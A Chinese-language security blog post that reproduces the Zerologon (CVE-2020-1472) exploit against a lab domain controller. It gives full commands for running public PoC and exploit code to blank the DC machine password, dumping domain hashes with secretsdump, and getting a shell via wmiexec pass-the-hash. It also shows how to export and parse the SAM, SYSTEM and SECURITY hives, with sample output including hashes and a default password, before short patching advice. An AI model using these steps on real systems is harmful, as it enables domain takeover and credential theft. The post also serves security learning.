近10年微软最严重漏洞复现

cht 2023-06-08 10次阅读

近10年微软最严重漏洞复现-图1

本文采写目的仅作为信息安全学习与交流之用，凡经由传播或利用此文提供之信息所造成的任何直接或间接后果及损失，均由使用者本人负责

德慎思信息安全播客第 1 期

相关报道

微软修复了Zerologon高危漏洞：可提权为域管理员接管企业网络

可3秒入侵Windows服务器：微软敦促客户尽快修复Zerologon漏洞

美国国土安全部发出罕见紧急警告：Windows存在“严重”漏洞

今年最严重Windows漏洞之一：有黑客利用Zerologon植入服务器后门

微软称伊朗黑客正在利用今年危害性最大的Zerologon漏洞

漏洞概述

基本上可以说是无条件地绕过了身份认证这个环节，取得了域控的权限。

漏洞影响

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2012

Windows Server 2012 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 R2 (Server Core installation)

Windows Server 2016

Windows Server 2016 (Server Core installation)

Windows Server 2019

Windows Server 2019 (Server Core installation)

Windows Server, version 1903 (Server Core installation)

Windows Server, version 1909 (Server Core installation)

Windows Server, version 2004 (Server Core installation)

报告时间

Secura/Tom Tervoort 通报微软 CVE-2020-1472

2020-08-11 微软发布安全补丁

2020-09-18 美国国土安全部下达紧急命令，要求本国政府机关必须在 21日 24:00 前修补

2020-09-24 微软威胁情报中心 MSTIC 追踪到对漏洞的威胁活动

攻击复现

近10年微软最严重漏洞复现-图2

攻击机

近10年微软最严重漏洞复现-图3

目标机

工具

poc - https://github.com/SecuraBV/CVE-2020-1472

exp - https://github.com/dirkjanm/CVE-2020-1472

impacket - https://github.com/SecureAuthCorp/impacket.git

POC验证

$ git clone https://github.com/SecuraBV/CVE-2020-1472.git $ cd CVE-2020-1472 CVE-2020-1472 $ pip install -r requirements.txt CVE-2020-1472 $ python zerologon.py dc08 192.168.10.100

攻击过程

无须加入 AD，只需要通过 445 连接到 DC 就可以展开攻击

整体流程

清空 DC 中的机器帐户用户密码（如本例中 dc08$ 用户的密码，exp 完成此操作）

获取域控用户的哈希值

获取 shell （通过获取到的管理员哈希值）

通过获取到的哈希值恢复置空的域控密码

下载最新 impacket

# 安装 impacket $ git clone https://github.com/SecureAuthCorp/impacket.git $ cd impacket impakcet $ python setup.py install $ pip list

近10年微软最严重漏洞复现-图4

pip list

下载 exp，开始攻击

$ git clone https://github.com/dirkjanm/CVE-2020-1472.git $ cd CVE-2020-1472 CVE-2020-1472 $ python cve-2020-1472-exploit.py 08dc 192.168.10.100

近10年微软最严重漏洞复现-图5

将域控机器用户密码置空，注意：将对 DC 有影响，谨慎

漏洞利用

获取域控用户的哈希值

使用 impacket 的 secretsdump.py 导出域控制上的哈希

~impacket/examples/ # windows python secretsdump.py DOMAIN/DC_NETBIOS_NAME$@DC_IP_ADDR -just-dc -no-pass # others python secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass

实操

python secretsdump.py red.com/dc08$@192.168.10.100 -just-dc -no-pass

近10年微软最严重漏洞复现-图6

获取 shell

通过上一步获取到的管理员哈希值得到一个 shell，然后连接 DC 导出 SAM 中原来的哈希

~impacket/examples/ python wmiexec.py -hashes <HASH> DOMAIN/DOMAIN_USER@DC_IP_ADDR

实操

C:\Users\admin\Desktop\code\impacket\examples (master -> origin) λ python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942 red.com/administrator@192.168..10.100

近10年微软最严重漏洞复现-图7

获取 DC 上 SAM

C:\Users\admin\Desktop\code\impacket\examples (master -> origin) λ python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942 red.com/administrator@192.168..10.100 Impacket v0.9.22.dev1+20201015.130615.81eec85a - Copyright 2020 SecureAuth Corporation [*] SMBv2.1 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\> C:\>hostname dc08 C:\>reg save HKLM\SYSTEM system.save [-] Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec ɹɡ C:\>reg save HKLM\SAM sam.save [-] Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec ɹɡ C:\>reg save HKLM\SECURITY security.save [-] Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec ɹɡ C:\>dir [-] Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec C еľûбǩ к 826F-C49C C:\ Ŀ¼ 2020/09/17 10:40 2,292 AiOLog.txt 2009/07/14 11:20 <DIR> PerfLogs 2020/10/27 19:04 <DIR> Program Files 2020/10/27 19:04 <DIR> Program Files (x86) 2020/10/27 20:18 28,672 sam.save 2020/10/27 20:18 32,768 security.save 2020/10/27 20:14 11,182,080 system.save 2020/09/17 14:41 <DIR> tools 2020/09/17 09:39 <DIR> Users 2020/10/27 20:18 <DIR> Windows 4 ļ 11,245,812 ֽ 6 Ŀ¼ 28,854,845,440 ֽ C:\>get system.save [*] Downloading C:\\system.save C:\>get sam.save [*] Downloading C:\\sam.save C:\>get security.save [*] Downloading C:\\security.save C:\>del /f system.save C:\>del /f sam.save C:\>del /f security save [-] Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec Ҳ C:\security C:\>exit C:\Users\admin\Desktop\code\impacket\examples (master -> origin)

解析哈希值

C:\Users\admin\Desktop\code\impacket\examples (master -> origin) λ python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL Impacket v0.9.22.dev1+20201015.130615.81eec85a - Copyright 2020 SecureAuth Corporation [*] Target system bootKey: 0x83c0d28e2de4a1dabdd85173f9f51ab4 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC $MACHINE.ACC:plain_password_hex:6d554f8bbb8dfab162d62d60764cd51a89362f928231339ec0152aeb8ac024fa5ca5963ad5d910cf46d182e2ec5b747b9e9622f15f136a24e6572f1aae05124b70ab32b3bb5852be3c434ef32ce09d60bf7f535c14490b936e37517dc60c9a653976e0974b3a6f8ecf0a20cecdc83b9bcfac959786b52bae8497c57dd4ce963d737c3af6007b461b42a3895d1676b7c3a2fcfc502214b9af3bfb11f858082f48b07b216c8b39c411dd932b3c0ea82ad73b05f3dee965fd42fd63d1cdb0458e57cb809fed6f76cd0682da9d63171398cffd74417412b437c4f25086fa0e602fac2e31d5019d9bbd51b94a63eaa5ad4dd1 $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:84e8c3ee5d3d725a00d3195cbd79c922 [*] DefaultPassword (Unknown User):ROOT#123 [*] DPAPI_SYSTEM dpapi_machinekey:0x513a838fa7c8300a25ca527b6146ec3955df748c dpapi_userkey:0x6616819fd9a4db354fda5b0e286f3ec37888d343 [*] NL$KM 0000 97 DA 18 77 A4 98 1F 49 5A 6B 07 24 06 4A 2D 86 ...w...IZk.$.J-. 0010 67 C2 F0 32 6F 49 74 41 93 E9 23 0F FC AE A0 11 g..2oItA..#..... 0020 E5 FF 99 E9 1D 1D F7 82 52 21 91 58 16 7A 8E FF ........R!.X.z.. 0030 8F 27 0E AF 2B 98 FE D7 28 6C 72 D1 58 9D 4C 46 .'..+...(lr.X.LF NL$KM:97da1877a4981f495a6b0724064a2d8667c2f0326f49744193e9230ffcaea011e5ff99e91d1df78252219158167a8eff8f270eaf2b98fed7286c72d1589d4c46 [*] Cleaning up... C:\Users\admin\Desktop\code\impacket\examples (master -> origin)

保存图片中指定部分

近10年微软最严重漏洞复现-图8

# ORI_HASH 84e8c3ee5d3d725a00d3195cbd79c922

恢复哈希值

# ~impacket/examples/zerologon git clone https://github.com/risksense/zerologon cd zerologon\ python reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR <ORI_HASH>

实操

C:\Users\admin\Desktop\code\impacket\examples\zerologon (master -> origin) λ python reinstall_original_pw.py dc08 192.168.10.100 84e8c3ee5d3d725a00d3195cbd79c922 Performing authentication attempts... =============== NetrServerAuthenticate3Response ServerCredential: Data: b'us#\xdb(\xb3\xbcp' NegotiateFlags: 556793855 AccountRid: 1000 ErrorCode: 0 server challenge b'uA\x02\xe9\x0e\x90\x1d(' session key b'\x92\xd3(\xae)a\xb7\x99\xb3N\xc7\xa3g\xbf(F' NetrServerPasswordSetResponse ReturnAuthenticator: Credential: Data: b'\x01\r@\xe2\xcd\xb5z\x8d' Timestamp: 0 ErrorCode: 0 Success! DC machine account should be restored to it's original value. You might want to secretsdump again to check. C:\Users\admin\Desktop\code\impacket\examples\zerologon (master -> origin)

检查是否恢复成功

再次获取哈希值，确认机器域的用户密码是否为空

# ~/impacket/examples # windows python secretsdump.py DOMAIN/DC_NETBIOS_NAME$@DC_IP_ADDR -just-dc -no-pass # others python secretsdump.py DOMAIN/DC_NETBIOS_NAME\$@DC_IP_ADDR -just-dc -no-pass

验证

python secretsdump.py red.com/dc08$@192.168.10.100 -just-dc -no-pass

防护建议

更新系统补丁（安装2020年8月11日发布的更新补丁）

监控系统的事件查看器，监控事件日志 id 为 4264 的日志

参考

微软官方介绍 - https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2020-1472

CVE-2020-1472复现指北 - https://cloud.tencent.com/developer/article/1700109

https://github.com/SecureAuthCorp/impacket/

https://github.com/risksense/zerologon

https://www.cnblogs.com/potatsoSec/p/13710947.html

欢迎关注我们，请微信搜索德慎思信息安全

转载自头条号：德慎思信息安全。（侵删）